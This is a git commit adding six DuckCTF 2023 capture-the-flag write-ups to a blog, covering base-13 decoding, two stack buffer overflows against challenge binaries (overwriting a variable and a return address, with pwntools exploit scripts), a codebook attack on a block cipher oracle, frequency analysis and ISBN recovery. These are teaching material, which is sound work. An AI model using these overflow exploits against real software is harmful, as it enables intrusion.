how about now?
LachlanS7 committed Aug 4, 2023
1 parent 3a8b7d8 commit 4a180b6
Showing 6 changed files with 352 additions and 0 deletions.
33 changes: 33 additions & 0 deletions content/posts/2023/duckctf/based-crypto-challenge.md
@@ -0,0 +1,33 @@
---
layout: post
title: A Based Crypto Challenge - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: There's not much to say here other than this challenge is **BASED**.
author: lachlan
categories:
- ctf
- write-ups
- crypto
---

As hinted by the challenge title and description, this challenge is just some sort of base encoding. This is further confirmed by looking at the encoded data:

```
8990767883967987868C74768B8B90857A747A8678877981867C8B98
```

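To determine the base, let us look at the symbols used. The data only contains the digits `0-9` and the letters `A-C`, and the largest symbol is `C` (value 12), so the base must be at least 13. (The digit `2` happens not to appear, so there are 12 distinct symbols in this particular string.) There is of course a chance it is some larger base where, by chance, the higher symbols did not get used, but let us first try base 13.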

To decode base 13, we will need to make some assumptions about how the data was encoded.
1) The underlying data is regular ASCII -- i.e. `0 - 127`;
2) `0-9` in base 13 represents `0-9` in decimal, and `A-C` in base 13 represents `10-12` in decimal;
3) Each character has been encoded into base 13 individually, and the results have been concatenated.

From these assumptions, let us consider the minimum number of base 13 digits required to represent an ASCII character -- i.e. how many base 13 digits are needed to represent a number between 0 and 127? Well, one digit will give a range between 0 and 12, and two digits will range from 0 to 168 (as $13^2 - 1 = 168$). Hence we need at least 2 digits to represent all of the standard ASCII characters in base 13. So, if we assume that every two characters in the encoded data are one ASCII character, the first character of the encoded data is `89` in base 13, which is $8 \times 13 + 9 = 113$ in decimal and thus `q` in ASCII.

If we follow this process for all other pairs of characters in the encoded data, we get the flag

`quack{dont_assume_encodings}`
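
The pair-by-pair decoding can also be done in a few lines of Python. This is a minimal sketch under the three assumptions listed above (two base 13 digits per ASCII character); the variable names are only illustrative.

```python
# Encoded data from the challenge
encoded = "8990767883967987868C74768B8B90857A747A8678877981867C8B98"

# Split into two-digit blocks, one block per ASCII character
pairs = [encoded[i:i + 2] for i in range(0, len(encoded), 2)]

# int(x, 13) parses a base 13 string; it accepts A-C as the digits 10-12
flag = "".join(chr(int(pair, 13)) for pair in pairs)
print(flag)
```

Python's built-in `int` handles any base from 2 to 36, so the same snippet can be used to try other bases if base 13 had not produced readable text.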

#### Cyberchef Usage
Decoding from an arbitrary base can be done on CyberChef through the use of the `From Charcode` ingredient.
40 changes: 40 additions & 0 deletions content/posts/2023/duckctf/easy-overflow.md
@@ -0,0 +1,40 @@
---
layout: post
title: Easy Overflow - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: I store all of my private data in all of my programs. I mean, why not? It is safe, right...
author: lachlan
categories:
- ctf
- write-ups
- pwn
---

We have been provided with the C code for this challenge:

```C=
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    int id = 0;
    char name[16] = "";

    printf("Input your name: ");
    gets(name);
    printf("Your name is %s with ID %d.\n", name, id);

    if (id == 1179402567) {
        printf("%s\n", argv[1]);
    }
    return 0;
}
```

As we can see, the program uses the vulnerable `gets` function, which performs no bounds checking. We can use it to overwrite the `id` variable, which sits just above the `name` variable on the stack. To do this, we need to write 16 bytes to fill `name` and then our desired value into `id`, which is `1179402567`. The only friction is that `gets` stores raw bytes, so we must type the characters whose byte values make up `1179402567`. Converting `1179402567` to hexadecimal gives `0x464C4147`, which is the ASCII string `FLAG`, so it is easy enough to enter by hand. The final potential problem is that strings are written to the stack starting at the lowest memory address and ending at the highest. As this binary is little endian, the least significant byte of `id` is stored first, which means that we have to enter `FLAG` backwards. This gives our final payload of:
```
aaaaaaaaaaaaaaaaGALF
```

Entering this into the running binary gives us the flag `quack{gets_is_vulnerable}`.
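
The byte-order reasoning can be checked with Python's `struct` module. This is a small sketch, assuming (as the write-up does) that `id` sits directly after the 16 bytes of `name` with no padding in between; the constant names are only illustrative.

```python
import struct

TARGET_ID = 1179402567  # value the program compares id against
NAME_SIZE = 16          # size of the name buffer in the C source

# "<I" packs an unsigned 32-bit integer in little-endian byte order
id_bytes = struct.pack("<I", TARGET_ID)

payload = b"a" * NAME_SIZE + id_bytes
print(hex(TARGET_ID))
print(payload)
```

The packed bytes come out as `GALF`, which is `FLAG` reversed, matching the payload typed by hand.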
56 changes: 56 additions & 0 deletions content/posts/2023/duckctf/homebrewed-block-cipher.md
@@ -0,0 +1,56 @@
---
layout: post
title: Homebrewed Block Cipher - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: I have finally created my own, completely secure, cipher. I am so confident that I will even allow you to encrypt your own data with it.
author: lachlan
categories:
- ctf
- write-ups
- crypto
---

In this challenge, we are given an oracle that will encrypt our input with a constant key. We are also given a redacted version of the encrypting script.

Reading through the script, we can see that data is encrypted by splitting it into blocks of two characters, encrypting each block individually (with a redacted function), and then concatenating the output. Furthermore, by connecting to the oracle, we can see that each block is encrypted to a fixed size of 40 characters.

These observations make the encryption very weak. Because each block is encrypted independently with a constant key, the same pair of characters always produces the same 40 characters of ciphertext. If we build a table of what every pair of characters encrypts to, we can decrypt any message by splitting it into blocks of 40 characters and looking up each block in the table.
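
To illustrate the idea without a network connection, here is a minimal offline sketch. The real block function is redacted, so `toy_oracle` is a purely hypothetical stand-in (a keyed SHA-1, chosen only because it is deterministic and outputs 40 hex characters per block); the key, alphabet and test message are likewise assumptions.

```python
import hashlib
import string
from itertools import product

BLOCK_IN = 2    # plaintext characters per block
BLOCK_OUT = 40  # ciphertext characters per block, as observed from the oracle

def toy_oracle(plaintext, key=b"hypothetical-key"):
    """Stand-in for the redacted cipher: each 2-char block -> 40 hex chars."""
    blocks = [plaintext[i:i + BLOCK_IN] for i in range(0, len(plaintext), BLOCK_IN)]
    return "".join(hashlib.sha1(key + block.encode()).hexdigest() for block in blocks)

# Encrypt every possible pair once and remember what it maps to
alphabet = string.ascii_lowercase + "{}"
pairs = ["".join(p) for p in product(alphabet, repeat=BLOCK_IN)]
reply = toy_oracle("".join(pairs))
table = {reply[i * BLOCK_OUT:(i + 1) * BLOCK_OUT]: pair for i, pair in enumerate(pairs)}

def decrypt(ciphertext):
    """Look up each 40-character block in the table built above."""
    blocks = [ciphertext[i:i + BLOCK_OUT] for i in range(0, len(ciphertext), BLOCK_OUT)]
    return "".join(table[block] for block in blocks)

secret = toy_oracle("quack{toy}")  # pretend this is all we were given
recovered = decrypt(secret)
print(recovered)
```

The attack never needs the key or the block function itself: with only 28 symbols there are just 784 possible blocks, so the whole codebook fits in a single oracle query.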

The following Python script implements this exact solution:

```python=
import string  # used for ascii_lowercase below
from itertools import product

from pwn import *

# ================= General Setup =================
conn = remote("chall.duckctf.com", 30002)

# Getting encrypted flag ([16:] skips the text before the ciphertext)
encryptedFlag = conn.recvline()[16:].strip()
conn.recvline()  # Cleaning new line

# Generating all possible pairs of characters in the characterSet
characterSet = list(string.ascii_lowercase + '0{}')
pairs = [p[0] + p[1] for p in product(characterSet, repeat=2)]

# ============ Creating a lookup table ============
# For speed, we just send all pairs at once
# and split into blocks afterwards. However, we
# could theoretically send each pair one by one
payload = ''.join(pairs)
conn.sendline(payload.encode('utf-8'))
enc = conn.recvline()[32:].strip()  # [32:] skips the text before the ciphertext
encPairs = [enc[i:i+40] for i in range(0, len(enc), 40)]
table = dict(zip(encPairs, pairs))

# =============== Decrypting Flag ================
# Splitting the encrypted flag into blocks of 40
blocks = [encryptedFlag[i:i+40] for i in range(0, len(encryptedFlag), 40)]

# Searching for each block in lookup table
flag = ''.join([table[block] for block in blocks])
print(flag)
```

This gives the flag `quack{shortblockencryptionbad}`.
80 changes: 80 additions & 0 deletions content/posts/2023/duckctf/not-so-standard-substitution-cipher.md
@@ -0,0 +1,80 @@
---
layout: post
title: Not So Standard Substitution Cipher - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: I made a machine to implement a substitution cipher. The only issue is that it seemed to encrypt everything in sight, including my flag and all other random stuff. Each line in the attached file is a new piece of encoded information. Please save my flag! The flag will not be encased in `quack{...}`, but it will be the only reasonable text.
author: lachlan
categories:
- ctf
- write-ups
- crypto
---

We are given a file with 10,000 lines, each of which is a new piece of data encrypted with a substitution cipher with a different key. One of these lines is the flag, and the rest are just random characters.

To filter the rubbish out from the flag, we can use frequency analysis -- as a substitution cipher will not change the frequency of characters.

Ideally, we do not want to be comparing the character frequency distributions by hand. As such, we will want some way to rank each line in terms of their likelihood of being encrypted English -- i.e. some way to compare the frequency of English characters to the frequency of characters in each line. While there are numerous ways to do this, as the mathematician I am, I opted to compute the [Kullback–Leibler divergence](https://en.wikipedia.org/wiki/Kullback%E2%80%93Leibler_divergence) for each line. This quantity is essentially a measure of the difference between two distributions and is given by the equation

$$D_{KL}(P||Q) = -\sum_{x} P(x) \log \left(\frac{Q(x)}{P(x)}\right)$$,

where $P$ and $Q$ are the probability distributions of interest. Hence, if we calculate the probability of each character occurring on each line and apply this formula along with the expected character frequency for English, we should see that the flag has the lowest divergence as it is the only data that is English. The following script does just that:

```python=
from collections import Counter
from math import log
import re


def getProbDist(s):
    # Relative frequency of each symbol, sorted from most to least common.
    # Sorting discards which letter is which, so the result is unchanged
    # by a substitution cipher.
    n = len(s)
    freq = Counter(s)
    prob = [i/n for i in freq.values()]
    prob = sorted(prob, reverse=True)
    return prob


def KLD(P, Q):
    # Divergence summed over the ranks that both distributions share
    div = 0
    for i in range(min(len(P), len(Q))):
        div -= P[i] * log(Q[i] / P[i])
    return div


def main():
    # ==== Generating Probability Distribution From Sample Text ======
    with open('englishSample.txt') as f:
        englishSample = f.read().lower()
    # Stripping all but a-z characters
    englishSample = re.sub(r'[^a-z]', r'', englishSample)
    targetDist = getProbDist(englishSample)

    # Calculating Kullback–Leibler Divergence for each encrypted line
    rankings = {}
    with open('encrypted.txt') as f:
        for line in f:
            line = line.strip()
            dist = getProbDist(line)
            div = KLD(targetDist, dist)
            rankings[line] = div

    # Printing the most likely English string encrypted
    rankings = dict(sorted(rankings.items(), key=lambda item: item[1]))
    print(list(rankings.keys())[0])


if __name__ == "__main__":
    main()
```

Running this we find the most likely encrypted English string to be
```
tgetrprgrpzvpttgtnkorpehkrzjfkdgkvnbyvyhbtptyvsikfkpttzmkjphhkfnzvrkvrrzpvnfkytkrikhkvxrizjrikjhyxpvhpvkyfyhxkefyriknybhkbiymphrzvrikzfkmvymksyjrkfrikmyrikmyrpnpyvtyfrigfnybhkbyvsqphhpymfzqyviymphrzvtryrktriyrkukfbtdgyfkmyrfplzukfynzmmgryrpukfpvxtgniytrikfkyhzfnzmohklvgmekftzfrikpvrkxkfttyrptjpktprtzqvniyfynrkfptrpnkdgyrpzv
```

Decrypting this using an [online tool](https://www.dcode.fr/monoalphabetic-substitution) gives us
```
substitutionissusceptibletofrequencyanalysisandhereissomefillercontenttoincreasethelengthoftheflaginlinearalgebrathecayleyhamiltontheoremnamedafterthemathematiciansarthurcayleyandwilliamrowanhamiltonstatesthateverysquarematrikoveracommutativeringsuchastherealorcompleknumbersortheintegerssatisfiesitsowncharacteristicequation
```
This is indeed English text, and it is the flag for the challenge.
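
To see why the ranking works, here is a small self-contained sketch. It is not the script used during the CTF: the reference frequencies are rounded, approximate English letter percentages hard-coded for illustration, the substitution key is an arbitrary rotation, and all names are hypothetical. It shows that a substitution cipher leaves the sorted frequency distribution untouched, and that English-like text scores a much lower divergence than perfectly flat text.

```python
from collections import Counter
from math import log
import string

# Approximate English letter frequencies in percent, most common first
# (rounded reference values, assumed here for illustration only)
ENGLISH_PERCENT = [12.7, 9.1, 8.2, 7.5, 7.0, 6.7, 6.3, 6.1, 6.0, 4.3, 4.0,
                   2.8, 2.8, 2.4, 2.4, 2.2, 2.0, 2.0, 1.9, 1.5, 1.0, 0.8,
                   0.15, 0.15, 0.1, 0.07]
REFERENCE = [p / 100 for p in ENGLISH_PERCENT]

def rank_distribution(text):
    """Symbol frequencies sorted from most to least common."""
    counts = Counter(text)
    return sorted((c / len(text) for c in counts.values()), reverse=True)

def kl_divergence(p, q):
    """Sum of p * log(p / q) over the ranks both distributions share."""
    return sum(p[i] * log(p[i] / q[i]) for i in range(min(len(p), len(q))))

plain = ("substitutionissusceptibletofrequencyanalysisandhereissome"
         "fillercontenttoincreasethelengthoftheflag")
alphabet = string.ascii_lowercase
key = alphabet[7:] + alphabet[:7]  # arbitrary substitution key
cipher = plain.translate(str.maketrans(alphabet, key))
flat = alphabet * 4                # every letter equally common

english_score = kl_divergence(REFERENCE, rank_distribution(cipher))
flat_score = kl_divergence(REFERENCE, rank_distribution(flat))
print(english_score, flat_score)
```

Since `rank_distribution(plain)` and `rank_distribution(cipher)` are identical, the score of a line does not depend on which key was used to encrypt it, which is what lets a single reference distribution rank all 10,000 lines.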
110 changes: 110 additions & 0 deletions content/posts/2023/duckctf/return-address-override.md
@@ -0,0 +1,110 @@
---
layout: post
title: Return Address Override - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: Ok. So buffer overflows exist, but if I put my data in a different function, my private data will be safe from buffer overflows.
author: lachlan
categories:
- ctf
- write-ups
- pwn
---

This challenge provides us with the binary, so let us begin by printing the symbol table of the binary with `objdump -t`:

```
SYMBOL TABLE:
0000000000000000 l df *ABS* 0000000000000000 crt1.c
0000000000000000 l df *ABS* 0000000000000000 crtstuff.c
0000000000403e60 l O .ctors 0000000000000000 __CTOR_LIST__
0000000000403e70 l O .dtors 0000000000000000 __DTOR_LIST__
0000000000402070 l O .eh_frame 0000000000000000 __EH_FRAME_BEGIN__
0000000000401090 l F .text 0000000000000000 deregister_tm_clones
00000000004010c0 l F .text 0000000000000000 register_tm_clones
0000000000401100 l F .text 0000000000000000 __do_global_dtors_aux
0000000000404020 l O .bss 0000000000000001 completed.2
0000000000404028 l O .bss 0000000000000008 dtor_idx.1
0000000000401190 l F .text 0000000000000000 frame_dummy
0000000000404040 l O .bss 0000000000000030 object.0
0000000000000000 l df *ABS* 0000000000000000 crtstuff.c
0000000000403e68 l O .ctors 0000000000000000 __CTOR_END__
00000000004020d0 l O .eh_frame 0000000000000000 __FRAME_END__
00000000004012b0 l F .text 0000000000000000 __do_global_ctors_aux
0000000000000000 l df *ABS* 0000000000000000 med.c
0000000000000000 l df *ABS* 0000000000000000
0000000000403e80 l O .dynamic 0000000000000000 _DYNAMIC
0000000000402000 l .eh_frame_hdr 0000000000000000 __GNU_EH_FRAME_HDR
0000000000403fd0 l O .got 0000000000000000 _GLOBAL_OFFSET_TABLE_
0000000000000000 F *UND* 0000000000000000 gets
0000000000404008 g O .data 0000000000000000 .hidden __TMC_END__
0000000000403e78 g O .dtors 0000000000000000 .hidden __DTOR_END__
0000000000000000 F *UND* 0000000000000000 puts
0000000000404000 g O .data 0000000000000000 .hidden __dso_handle
0000000000401000 g F .init 0000000000000001 _init
00000000004011d3 g F .text 00000000000000a0 getName
00000000004011bd g F .text 0000000000000016 win
0000000000401050 g .text 0000000000000000 _start
0000000000401066 g F .text 0000000000000024 _start_c
0000000000404008 g .bss 0000000000000000 __bss_start
0000000000401273 g F .text 000000000000002f main
00000000004012f1 g F .fini 0000000000000001 _fini
0000000000404008 g .data 0000000000000000 _edata
0000000000404078 g .bss 0000000000000000 _end
0000000000000000 F *UND* 0000000000000000 __libc_start_main
0000000000404070 g O .bss 0000000000000008 FLAG
```

As we can see, `gets` is being used, which means this program is likely vulnerable to a buffer overflow with `gets`. So, without trying anything else yet, let us see if we can cause a segfault.

```
python -c "print('a' * 10000)" | ./med
```

Upon running the command above, we get the following error;
```
Segmentation fault (core dumped)
```
Awesome! This means we overwrote the return address that was pushed to the stack when calling the function that calls `gets`. When that function tried to return, it jumped to an address that is not part of the binary, which caused the crash. Hence, if we work hard enough, we can tell the function to return to a location we desire (perhaps a part of the binary that prints the flag).

To do this, we need to:

1) Determine exactly how many characters are required in our input before we start changing the return address (this is called the offset)
2) Find a location that runs the code we want to run (say print the flag)

The first job is easy enough. We know that 10000 characters is too many, so how about 500? That also segfaults. So how about 250? Yep, still segfaults. What about 100? Nope. Runs fine. 128? Yes. 127? Nope! This means that the buffer is 128 bytes long: `gets` replaces the trailing newline with a null terminator, so 127 characters write exactly 128 bytes and stay inside the buffer, while 128 characters spill one byte past it. On x86-64, the 8 bytes directly after the buffer hold the saved base pointer (pushed by the `push %rbp` at the start of the function), and the return address comes after that. So the offset to the return address is 128 + 8 = 136, and our payload should be 136 filler characters followed by our desired address.
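
The manual search above is really a bisection on the input length, which can be sketched as follows. The `simulated_crashes` predicate is a hypothetical stand-in that simply encodes the behaviour observed above; in practice it would be replaced by something that feeds `n` characters to the binary and reports whether it segfaulted.

```python
def smallest_crashing_length(crashes, low, high):
    """Smallest n in (low, high] for which crashes(n) is True.

    Assumes crashes(low) is False, crashes(high) is True, and that
    every length above the threshold also crashes.
    """
    while high - low > 1:
        mid = (low + high) // 2
        if crashes(mid):
            high = mid
        else:
            low = mid
    return high

def simulated_crashes(n):
    # Stand-in for running the binary: mirrors the observations above
    return n >= 128

threshold = smallest_crashing_length(simulated_crashes, 100, 250)
print(threshold)
```

Starting from the known bounds of 100 (runs fine) and 250 (segfaults), this needs only a handful of runs to land on the first crashing length.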

To find a location in the code we might want to jump to, we can look at our symbol table again. We see that there is a function called `win`, and if we look at the disassembly for `win` (with `objdump -d`):

```
00000000004011bd <win>:
4011bd: 55 push %rbp
4011be: 48 89 e5 mov %rsp,%rbp
4011c1: 48 8b 05 a8 2e 00 00 mov 0x2ea8(%rip),%rax # 404070 <FLAG>
4011c8: 48 89 c7 mov %rax,%rdi
4011cb: e8 60 fe ff ff call 401030 <puts@plt>
4011d0: 90 nop
4011d1: 5d pop %rbp
4011d2: c3 ret
```

we can see that it will print the flag. So let us jump to `win` which is at address `0x004011bd`.

The following program does just this
```python=
from pwn import *
# Remote
shell = remote('chall.duckctf.com', 30003)
# Local with test flag
#shell = process(['./med', "flag{test flag}"])
winAddress = 0x004011bd
payload = b'a' * 136 + p64(winAddress)
shell.sendline(payload)
shell.interactive()
```

Running this gives the flag `quack{a_simple_return_address_override}`.
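
For readers without pwntools installed, the payload layout can be reproduced with the standard library. This sketch assumes the default pwntools behaviour, where `p64` packs an unsigned 64-bit value in little-endian order; the constant names are only illustrative.

```python
import struct

WIN_ADDRESS = 0x4011BD  # address of win from the disassembly
PADDING = 136           # filler bytes used in the exploit script

# "<Q" packs an unsigned 64-bit integer in little-endian byte order
packed = struct.pack("<Q", WIN_ADDRESS)
payload = b"a" * PADDING + packed

print(packed.hex())
print(len(payload))
```

The address bytes appear reversed in the payload (`bd 11 40 00 ...`) for the same little-endian reason that `FLAG` had to be entered backwards in the previous challenge.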
33 changes: 33 additions & 0 deletions content/posts/2023/duckctf/the-lost-book.md
@@ -0,0 +1,33 @@
---
layout: post
title: The Lost Book - DuckCTF 2023
date: 2023-08-04T00:00:00.000Z
description: I run a library, but recently one of my books was returned damaged. Can you please find the book title? *The flag for this challenge is the title of this book in the original language.*
author: lachlan
categories:
- ctf
- write-ups
- osint
---

This challenge only provides the following image of a book cover;
![](https://hackmd.io/_uploads/SJr3_Bqin.jpg)

As we can see, the ISBN is partially corrupted, and the goal is to recover the ISBN and thus recover the book title.

After some quick [googling](https://en.wikipedia.org/wiki/ISBN#Overview), the structure of an ISBN-10 code can be found. The following information is relevant:

1) The first digits represent the country of publication,
2) the next few digits represent the publisher,
3) the remaining digits except the final digit specify the book's title and edition,
4) and the final digit is a checksum.

While the specific number of digits in each section varies with the size of the publisher, the country, etc., we can still use this information and the corrupted ISBN provided to recover the book.

First, we can see that the first digit is missing; thus we need to identify the country of publication. As the characters on the book cover are Japanese, it is safe to assume the country is Japan, which has a code of `4`. Thus the first character of the ISBN is `4`.

Next, we need to determine the publisher and their ISBN publisher code. For this, Google Lens comes to our aid! Scanning the book, we can tell that the publisher is [`オーム社 (ohmsha)`](https://www.ohmsha.co.jp/). Searching for this and going to the Japanese publications, we can see that they have published a large variety of books (hence brute-forcing it from here will not work). However, as the publisher code in ISBNs is mostly constant, we can just select any book published by them, and copy the publisher code from its ISBN. Doing this will give us the publisher code of `274`. The `2` in `274` aligns with the `2` already given to us in the ISBN, which is a good sign!

Finally, we need to determine the last missing digit. While this could be brute forced, we can also use the checksum in the ISBN (its final digit) to recover the missing digit. While I will not go into the details here, the checksum calculation is clearly explained in the [Wikipedia article for ISBNs](https://en.wikipedia.org/wiki/ISBN#ISBN-10_check_digits), and reversing it to recover a single digit is a simple exercise in algebra. Doing this gives the missing digit `7`.
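
The checksum step can be sketched in Python. An ISBN-10 is valid when its digits, weighted 10 down to 1 from left to right, sum to a multiple of 11. The position of the `?` in the pattern below is an assumption made for illustration (the damaged ISBN is only visible in the image), and the function names are hypothetical. For simplicity the sketch ignores the `X` check digit, which this ISBN does not use.

```python
def isbn10_is_valid(isbn):
    """True if the weighted digit sum (weights 10..1) is divisible by 11."""
    total = sum((10 - position) * int(char) for position, char in enumerate(isbn))
    return total % 11 == 0

def recover_missing_digit(pattern):
    """Try every digit in place of the single '?' and keep the valid ones."""
    return [d for d in "0123456789" if isbn10_is_valid(pattern.replace("?", d))]

# Assumed position of the unreadable digit, for illustration only
candidates = recover_missing_digit("4274066?46")
print(candidates)
```

Because 11 is prime, at most one digit can satisfy the checksum for any single missing position, so the recovered digit is unambiguous.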

Putting all the digits together gives us the final ISBN of `4274066746`. Looking this up on an [ISBN lookup](https://isbnsearch.org/) will give us the book (and flag) `マンガでわかる暗号`, which in English is `Cryptography Understood by Manga`.
